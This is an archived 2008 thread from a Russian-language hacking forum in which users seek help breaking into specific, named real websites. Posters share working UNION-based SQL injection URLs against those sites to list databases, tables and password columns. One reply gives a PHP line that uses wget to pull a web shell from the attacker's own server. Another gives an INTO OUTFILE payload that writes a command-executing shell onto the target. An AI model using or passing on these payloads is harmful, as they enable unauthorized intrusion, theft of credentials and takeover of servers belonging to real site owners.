ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
01.09.2008, 16:33
|
|
Постоянный
Регистрация: 07.03.2008
Сообщений: 479
Провел на форуме:
791766
Репутация:
61
|
|
А не подскажите что можно сделать с сайтом у которого идёт фильтрация против SQl инъекций...
Движок: PHP-nuke
Модули:
/modules.php?name=WhatYourSpeed
/modules.php?name=Rules
/modules.php?name=Downloads
Ссылка: _http://la2ice.ru/
|
|
|
01.09.2008, 17:50
|
|
Новичок
Регистрация: 24.07.2008
Сообщений: 29
Провел на форуме:
109513
Репутация:
52
|
|
Доброго времени суток!
сайт http://geograd.ru/
magic_quotes off
мускул 5-ой версии
http://geograd.ru/?geo=-1&idnew=-328%27+union+select+1,2,3,4,table_schema+from+info rmation_schema.tables/*%22
тут все базы,судя по ним на серве крутится много сайтиков(если не прав,поправьте)
подскажите,как можно залить шелл на серв в данном случае?
|
|
|
|
01.09.2008, 18:00
|
|
Banned
Регистрация: 06.01.2008
Сообщений: 413
Провел на форуме:
1301036
Репутация:
1334
|
|
<? system("cd ../../;wget http://...../shell.php"); ?>
cd ../../ - папка куда залить..
wget - качалка. взависимости еcть ли он на серве..
может быть lynx и т.д.
http://...../shell.php - твой сайт с php-шеллом
Ps: Если скрипт пропускает какие-то символы шел никак не залить. (конечно, может быть случай когда поле "отправить коментарий" выпоняет команду на сервере, но такой случай мы не будем рассматривать)
Поэтому советую xss или sql inj, дабы получить админ права. А у админа больше прав, там уже и до шела не далеко  |
|
|
|
01.09.2008, 18:01
|
|
Участник форума
Регистрация: 12.01.2007
Сообщений: 262
Провел на форуме:
4608122
Репутация:
874
|
|
Похоже что права есть... значит можно залить шелл использую into outfile '/Полный путь/имя.php
Нужно найти путь
запрос выглядеть будет так
union+select+1,2,'<? system($_GET["id"]); ?>',4,5+into outfile '/Полный путь/имя.php'/*
Последний раз редактировалось Red_Red1; 01.09.2008 в 18:10..
|
|
|
|
01.09.2008, 19:22
|
|
Постоянный
Регистрация: 02.03.2008
Сообщений: 893
Провел на форуме:
5365841
Репутация:
712
|
|
что мне даёт раскрытие пути до сайта ?
что можно с этим сделать ?
|
|
|
|
01.09.2008, 20:05
|
|
Постоянный
Регистрация: 24.05.2008
Сообщений: 589
Провел на форуме:
3629857
Репутация:
504
|
|
Сообщение от geforse
что мне даёт раскрытие пути до сайта ?
что можно с этим сделать ?
ты знаешь путь к папке, где лежат все скрипты сайта - следовательно ты знаешь куда можно залить шелл..
если есть файл-прив при скуль-инъекте то можешь опять же залить шелл, путь есть.. и вообще есть много способов как с этим расправится=)
|
|
|
|
01.09.2008, 20:17
|
|
Новичок
Регистрация: 04.09.2007
Сообщений: 13
Провел на форуме:
29295
Репутация:
4
|
|
всем привет,
в очередной раз наткнулся на такую неприятность, когда из 5 sql удалось выцепить все таблицы, но не одна из них не является таблицей с пользователями (все колонки в каждой просматрел) такое вообще возможно? И как с этим бороться?
Вот пример
_http://www.semenovsky.ru/?pageId=3&mode=cards&Id=-1+union+select+1,TABLE_NAME,3,4,5,6,7,8,9,10,11,12 ,13,14,15+from+information_schema.TABLES++limit+16 ,200--
Заранее благодарен
|
|
|
|
01.09.2008, 22:09
|
|
Новичок
Регистрация: 24.07.2008
Сообщений: 29
Провел на форуме:
109513
Репутация:
52
|
|
Сообщение от zjuk@
всем привет,
в очередной раз наткнулся на такую неприятность, когда из 5 sql удалось выцепить все таблицы, но не одна из них не является таблицей с пользователями (все колонки в каждой просматрел) такое вообще возможно? И как с этим бороться?
Вот пример
_http://www.semenovsky.ru/?pageId=3&mode=cards&Id=-1+union+select+1,TABLE_NAME,3,4,5,6,7,8,9,10,11,12 ,13,14,15+from+information_schema.TABLES++limit+16 ,200--
Заранее благодарен
такое вполне возможно,ничего такого тут нет,авторизация происходит значит по другому...
или на сайте вообще нет админки,что тоже вполне нормально для небольших проектов...
если я не прав,то поправьте)
|
|
|
|
01.09.2008, 23:32
|
|
Новичок
Регистрация: 12.06.2008
Сообщений: 19
Провел на форуме:
70897
Репутация:
3
|
|
1)http://www.wormshop.nl/news.php?id=-1+union+select+1,2,3,table_name,5,6+from+informati on_schema.tables/* -фсЁ ок)
2)http://www.wormshop.nl/news.php?id=-1+union+select+1,2,3,column_name,5,6+from+informat ion_schema.columns+where+table_name=0x7573657273/* -фсЁ ок)
3 финал) http://www.wormshop.nl/news.php?id=-1+union+select+1,2,3,concat_ws(0x3,password),5,6+f rom+users/* -не пашет((((((((
что не так с финальным запросом???????????
|
|
|
|
02.09.2008, 00:59
|
|
Познавший АНТИЧАТ
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293
Репутация:
4915
|
|
Сообщение от masterBlack
1)http://www.wormshop.nl/news.php?id=-1+union+select+1,2,3,table_name,5,6+from+informati on_schema.tables/* -фсЁ ок)
2)http://www.wormshop.nl/news.php?id=-1+union+select+1,2,3,column_name,5,6+from+informat ion_schema.columns+where+table_name=0x7573657273/* -фсЁ ок)
3 финал) http://www.wormshop.nl/news.php?id=-1+union+select+1,2,3,concat_ws(0x3,password),5,6+f rom+users/*
Вы прикалываетесь? Или я тупой? Где там инъекция? Или вы даёте советы даже не ходя по ссылкам?
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
